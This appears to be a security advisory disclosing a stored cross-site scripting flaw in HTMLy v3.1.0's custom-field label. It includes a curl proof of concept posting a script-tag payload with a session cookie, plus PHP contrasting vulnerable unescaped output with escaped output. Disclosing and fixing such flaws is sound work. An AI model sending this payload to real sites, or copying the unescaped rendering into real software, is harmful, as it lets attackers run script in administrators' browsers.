Vendor: https://github.com/danpros/htmly/

Product: htmly

Version: 3.1.0

Class: Stored XSS

Affected Versions: htmly v3.1.0

Impact: This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, enabling session hijacking, phishing, or redirection to malicious sites.

Description

HTMLy v3.1.0 contains a stored cross-site scripting (XSS) vulnerability. A user with the editor role can inject script through the label parameter of the custom fields page (admin/field/post). The payload is stored and later rendered in the add-content and edit-content views, so arbitrary web script or HTML executes in the browser of an administrator who subsequently creates a new blog post or edits an existing one.


Stored XSS affected locations:

  1. Input (source) - http://127.0.0.1:8082/htmly/admin/field/post (system/htmly.php)
  2. Output (sink) - system/admin/views/add-content.html.php, system/admin/views/edit-content.html.php

PoC:

curl -i -s -k -X POST \
    -H "Host: 127.0.0.1:8082" \
    -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
    -H "X-Requested-With: XMLHttpRequest" \
    -b "PHPSESSID=0gu56vfpv6dllgqe5uge3s422p" \
    --data-binary 'json=%5b%0a%20%20%7b%0a%20%20%20%20%22type%22%3a%20%22text%22%2c%0a%20%20%20%20%22name%22%3a%20%22xss-poc%22%2c%0a%20%20%20%20%22label%22%3a%20%22%3cscript%3ealert(1)%3c%2fscript%3e%22%2c%0a%20%20%20%20%22value%22%3a%20%22%22%2c%0a%20%20%20%20%22info%22%3a%20%22%22%0a%20%20%7d%0a%5d' \
    "http://[Your domain]/htmly/admin/field/post"

(The URL-encoded body decodes to a JSON array with one field: type "text", name "xss-poc", label "<script>alert(1)</script>", empty value and info.)
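The following PHP is an added illustration, not HTMLy's code: it shows the input-validation and output-escaping pattern that closes this class of bug, using the decoded PoC payload as sample input. Function names (parse_custom_fields, render_field_vulnerable, render_field_safe) are hypothetical.

```php
<?php
// Added example (not HTMLy's own code). Function names are hypothetical.

// Decode the "json" POST body from the PoC and sanity-check its shape.
// Labels are free text and are stored as-is; the fix belongs at output time.
function parse_custom_fields(string $json): array {
    $fields = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($fields)) {
        throw new InvalidArgumentException('custom fields must be a JSON array');
    }
    $clean = [];
    foreach ($fields as $f) {
        $type = $f['type'] ?? '';
        $name = $f['name'] ?? '';
        if (!in_array($type, ['text', 'textarea', 'checkbox'], true)) {
            throw new InvalidArgumentException('unsupported field type');
        }
        // Names become attribute values and array keys: restrict to a safe charset.
        if (!preg_match('/^[a-z0-9_-]{1,64}$/', $name)) {
            throw new InvalidArgumentException('invalid field name');
        }
        $clean[] = [
            'type'  => $type,
            'name'  => $name,
            'label' => (string)($f['label'] ?? ''),
            'value' => (string)($f['value'] ?? ''),
            'info'  => (string)($f['info'] ?? ''),
        ];
    }
    return $clean;
}

// Vulnerable pattern: the stored label is concatenated into the template
// unescaped, so a script tag stored in it runs in the admin's browser.
function render_field_vulnerable(array $f): string {
    return '<label for="' . $f['name'] . '">' . $f['label'] . '</label>';
}

// Hardened pattern: every stored string is escaped for the HTML context it lands in.
function render_field_safe(array $f): string {
    $e = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<label for="' . $e($f['name']) . '">' . $e($f['label']) . '</label>';
}

// Constructed sample: the PoC body above, URL-decoded.
$poc = '[{"type":"text","name":"xss-poc","label":"<script>alert(1)</script>","value":"","info":""}]';
foreach (parse_custom_fields($poc) as $f) {
    echo render_field_vulnerable($f), "\n";
    echo render_field_safe($f), "\n";
}
```

Running it prints the label once as live markup and once as inert text; the second form is what the add-content and edit-content views should emit.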

Steps to Reproduce

  1. Log in as an editor user and submit the custom field with the malicious label (see PoC above).

(screenshot: 1-fields.png)

  2. Log in as an administrator and create or edit a post; the stored label executes.